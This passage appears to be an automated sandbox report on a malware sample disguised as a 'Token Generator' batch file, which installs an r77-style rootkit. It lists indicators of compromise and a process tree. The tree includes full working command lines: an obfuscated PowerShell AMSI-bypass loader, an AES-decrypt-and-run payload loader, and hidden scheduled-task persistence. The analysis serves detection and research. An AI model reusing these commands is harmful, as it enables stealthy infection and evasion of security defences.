Token: SeIncBasePriorityPrivilege 1188 powershell.exe Token: SeCreatePagefilePrivilege 1188 powershell.exe Token: SeBackupPrivilege 1188 powershell.exe Token: SeRestorePrivilege 1188 powershell.exe Token: SeShutdownPrivilege 1188 powershell.exe Token: SeDebugPrivilege 1188 powershell.exe Token: SeSystemEnvironmentPrivilege 1188 powershell.exe Token: SeRemoteShutdownPrivilege 1188 powershell.exe Token: SeUndockPrivilege 1188 powershell.exe Token: SeManageVolumePrivilege 1188 powershell.exe Token: 33 1188 powershell.exe Token: 34 1188 powershell.exe Token: 35 1188 powershell.exe -
Suspicious use of FindShellTrayWindow 46 IoCs
Processes:
msedge.exeMBSetup.exepid process 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 5256 MBSetup.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe -
Suspicious use of SendNotifyMessage 32 IoCs
Processes:
msedge.exepid process 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
$77-powershell.exeExplorer.EXEpid process 3380 $77-powershell.exe 3464 Explorer.EXE 3464 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 3276 wrote to memory of 2756 3276 cmd.exe powershell.exe PID 3276 wrote to memory of 2756 3276 cmd.exe powershell.exe PID 2756 wrote to memory of 1188 2756 powershell.exe powershell.exe PID 2756 wrote to memory of 1188 2756 powershell.exe powershell.exe PID 2756 wrote to memory of 1872 2756 powershell.exe WScript.exe PID 2756 wrote to memory of 1872 2756 powershell.exe WScript.exe PID 1872 wrote to memory of 4892 1872 WScript.exe cmd.exe PID 1872 wrote to memory of 4892 1872 WScript.exe cmd.exe PID 4892 wrote to memory of 4592 4892 cmd.exe powershell.exe PID 4892 wrote to memory of 4592 4892 cmd.exe powershell.exe PID 4592 wrote to memory of 4932 4592 powershell.exe Token Generator.exe PID 4592 wrote to memory of 4932 4592 powershell.exe Token Generator.exe PID 4592 wrote to memory of 1744 4592 powershell.exe Install.exe PID 4592 wrote to memory of 1744 4592 powershell.exe Install.exe PID 4592 wrote to memory of 1744 4592 powershell.exe Install.exe PID 4592 wrote to memory of 2396 4592 powershell.exe schtasks.exe PID 4592 wrote to memory of 2396 4592 powershell.exe schtasks.exe PID 4592 wrote to memory of 1964 4592 powershell.exe $77-powershell.exe PID 4592 wrote to memory of 1964 4592 powershell.exe $77-powershell.exe PID 4860 wrote to memory of 3524 4860 powershell.EXE dllhost.exe PID 4860 wrote to memory of 3524 4860 powershell.EXE dllhost.exe PID 4860 wrote to memory of 3524 4860 powershell.EXE dllhost.exe PID 4860 wrote to memory of 3524 4860 powershell.EXE dllhost.exe PID 4860 wrote to memory of 3524 4860 powershell.EXE dllhost.exe PID 4860 wrote to memory of 3524 4860 powershell.EXE dllhost.exe PID 4860 wrote to memory of 3524 4860 powershell.EXE dllhost.exe PID 4860 wrote to memory of 3524 4860 powershell.EXE dllhost.exe PID 3524 wrote to memory of 624 3524 dllhost.exe winlogon.exe PID 3524 wrote to memory of 684 3524 dllhost.exe lsass.exe PID 3524 wrote to memory of 960 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 340 3524 dllhost.exe dwm.exe PID 3524 wrote to memory of 64 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 996 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1052 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1104 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1136 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1220 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1264 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1316 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1408 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1452 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1460 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1468 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1496 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1628 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1684 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1716 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1804 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1848 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1880 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1888 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1952 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1996 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 1012 3524 dllhost.exe spoolsv.exe PID 3524 wrote to memory of 2052 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 2176 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 2400 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 2408 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 2416 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 2492 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 2580 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 2604 3524 dllhost.exe sysmon.exe PID 3524 wrote to memory of 2652 3524 dllhost.exe svchost.exe PID 3524 wrote to memory of 2696 3524 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:624
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:340
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{eabfa77e-2b59-44a3-9a8e-cd43c8bcccb3}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3524
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:64
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1136 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3020
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RZldNxyYcDAh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DfzhPwccRrtCPB,[Parameter(Position=1)][Type]$JOvLQwFUeu)$vpPaKRwfUqx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+'ed'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+'y'+'M'+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+''+'e'+'','C'+'l'+''+'a'+''+[Char](115)+'s,'+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+'C'+[Char](108)+'as'+[Char](115)+','+'A'+''+[Char](117)+''+'t'+'oC'+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$vpPaKRwfUqx.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+','+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$DfzhPwccRrtCPB).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$vpPaKRwfUqx.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'ke',''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+'l',$JOvLQwFUeu,$DfzhPwccRrtCPB).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $vpPaKRwfUqx.CreateType();}$NIEcYkjPoXXZX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+'e'+''+'m'+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+'o'+'f'+'t'+[Char](46)+''+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+'.'+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+'d'+'s'+'');$hTxEXVpSnAdOgm=$NIEcYkjPoXXZX.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+'cA'+'d'+''+[Char](100)+'r'+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZuhxFHMbdzbhQEOxywe=RZldNxyYcDAh @([String])([IntPtr]);$xOBkisexqIgllhKcpvOyTu=RZldNxyYcDAh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$sdqnmrdbkMl=$NIEcYkjPoXXZX.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+'an'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2'+[Char](46)+'d'+[Char](108)+'l')));$DnxXOCIdcRsLJM=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$sdqnmrdbkMl,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+'ra'+'r'+''+'y'+''+'A'+'')));$PXvyitvJGJWSlQVDy=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$sdqnmrdbkMl,[Object](''+'V'+'irt'+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$FOdXqHa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DnxXOCIdcRsLJM,$ZuhxFHMbdzbhQEOxywe).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$AoyFSQZKZeOCvfnrl=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$FOdXqHa,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+'fe'+[Char](114)+'')));$lrXFsIyBpf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PXvyitvJGJWSlQVDy,$xOBkisexqIgllhKcpvOyTu).Invoke($AoyFSQZKZeOCvfnrl,[uint32]8,4,[ref]$lrXFsIyBpf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AoyFSQZKZeOCvfnrl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PXvyitvJGJWSlQVDy,$xOBkisexqIgllhKcpvOyTu).Invoke($AoyFSQZKZeOCvfnrl,[uint32]8,0x20,[ref]$lrXFsIyBpf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1452
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1628
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1880
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1888
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1996
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2052
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2580
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2880
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3368
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3464 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Token Generator.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Token Generator.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Token Generator.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_33_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_33.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1188 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_33.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_33.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3928
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_33.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_33.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Users\Admin\AppData\Local\Temp\Token Generator.exe"C:\Users\Admin\AppData\Local\Temp\Token Generator.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4932 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
PID:424 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:2228
-
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3380 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f9⤵
- Creates scheduled task(s)
PID:1112 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:1208
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"7⤵
- Executes dropped EXE
PID:1744 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:2396 -
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"7⤵
- Executes dropped EXE
PID:1964 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default2⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4772 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffd65cb46f8,0x7ffd65cb4708,0x7ffd65cb47183⤵PID:1060
-
